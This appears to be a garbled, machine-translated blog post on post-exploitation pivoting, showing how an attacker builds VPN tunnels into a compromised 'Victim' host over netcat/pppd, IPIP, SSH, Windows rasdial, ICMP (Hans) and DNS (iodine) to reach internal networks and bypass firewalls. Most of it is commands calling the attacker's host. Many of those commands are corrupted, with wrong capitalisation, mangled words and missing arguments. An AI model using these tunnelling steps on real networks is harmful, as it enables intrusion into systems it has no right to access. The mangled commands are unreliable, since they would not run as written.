Windows and Linux VPN tunnel setting

VPN Tunnel Windows Linux

VPN tunnels are designed to provide the attacker with full-fledged access to the internal network or isolated VLAN and open the opportunity for further comfortable promotion.

In this article, I will show how to create a VPN tunel in Windows and Linux via TCP (L3-tunnel), ICMP, DNS and through SSH (L2/L3-tunnels).

Setting up VPN tunnels

All examples of using tunnels require administrator or root.

VPN tunnel via TCP in one command (L3-tunnel)

In Linux, we can very elegantly raise the tunnel without using the customizable VPN server:

12 Attacker> SUDO PPPD Noauth PTY ‘NC -KLP 5555’Victim#> PPPD NoUute Persist Pty ‘NC Attacker 5555’

The tunnel was created. Now, to turn Victim into Gateway, you need to do the following:

12 Victim#> Echo 1 > /ProC/SYS/Net/IPV4/IP_Forwardvictim#> iptables -t nat -a postrouting -o eth0 -j masquarade

Finished, from this moment we can direct traffic to the internal network as it is, using only roaring:

1 Attacker> Sudo Route Add -net DEV tun0

It is worth noting that, using PPPD, we can create a tunnel on the initiative of any of the parties (Victim or Attacker). This means that we got the opportunity to get around the problems with the inters grinding screens. Work requires nuclear support (PPP_GENERIC module).

And here is another way to raise the tunnel using IPIP:

1234 Attacker> SUDO IP Tunnel Add Tun0 Mode IPIP Remote Victim Local Attacker Dev Eth0attacker> Sudo runconfig tun0 Pointopoint> IP Tunnel Add Tun0 Mode IPIP Remote Attacker Local Victim Dev Eth0victim#> runconfig tun0 Pointopoint

VPN tunnel via SSH (L2/L3-tunnels)

If Victim or Attacker has a SSH server, then this is enough to create VPN. First, you need to allow the connection of in/etc/ssh/sshd_config:

1 Permittunnel Point-to-Point

After that, you can create a connection:

123456 Attacker> SUDO SSH -N tun@victim -w 0: 0attacker> Sudo runconfig tun0 Pointopoint> runconfig tun0 Pointopoint> Sudo Route Add -net DEV tun0victim#> Echo 1 > /ProC/SYS/Net/IPV4/IP_Forwardvictim#> iptables -t nat -a postrouting -o eth0 -j masquarade

To organize access to the L3-Tunnel network will be enough. But if we want to not just score ports, but perform attacks such as ARP/NBNS/DHCP-Spoofing, you will need L2-tunnel. To do this, prescribe in/etc/ssh/sshd_config the following:

1 Permittunnel Ethernet

Restart the SSH server and perform the connection:


As always, with L2-tunnels you need to be very careful: due to the slightest error when creating bridges, a remote machine will go into eternal offline.

VPN tunnels on Windows

Windows from the box also supports VPN (in the PPTP/L2TP version). Moreover, you can control from the command line thanks to the built -in component:

1 Victim#> Rasdial.Exe Netname Username * /Phonebook: Network.ini

Config for Network.Ini looks as follows:

12345 [Netname] Media = Rastapiport = VPN9-0DEVICE = RASTAPIPHONENENUMBER = Attacker

Disconnect the VPN connection by the following command:

1 Victim#> Rasdial Netname /Disconnect

Do not forget about the classic OpenVPN, which works great on both Linux and Windows. In the presence of administrator rights, its use should not cause problems.

The exotic, but effective method of L2-tunity on Windows through virtualization was also described in this article.

VPN tunnel via ICMP

If the Internet access is prohibited, but the pings are allowed, then you can use Hans and create L3-Tunnel in two commands ( on Attacker and on Victim):

12 Attacker> Sudo ./Hans -s -p passwdvictim#> ./hans -c Attacker -p passwd -a

The client side for Windows works similarly, but the work will require a TAP interface that can be created using OpenVPN.

VPN tunnel via DNS

The last time we return to DNS. If the DNS settings are allowed by resolves of arbitrary domains, which happens often enough, then with the help of iDine we can create a full-fledged L3-Tunnel ( on Attacker and on Victim):

12 Attacker> Sudo ./iDined -f -p Passwd Attacker.tkvictim#> ./iDine -f -p passwd attacker.TK

More on the topic: Sprouting the Internet on DNS

VPN tunnels can be organized both directly between Attacker and Victim, and a combination of different port execution techniques. For example, we can use the DNS2TCP + PPPD combination instead of the iDine DNS tunnel.


Summing up, I would add that the use of VPN tunnels, although it gives comfortable access to the network, is still not a mandatory stage in penetration. If this cannot be done easily, then spending time on trabrishing is inappropriate. Almost always enough good good proxification of traffic.

Leave a Reply

Your email address will not be published. Required fields are marked *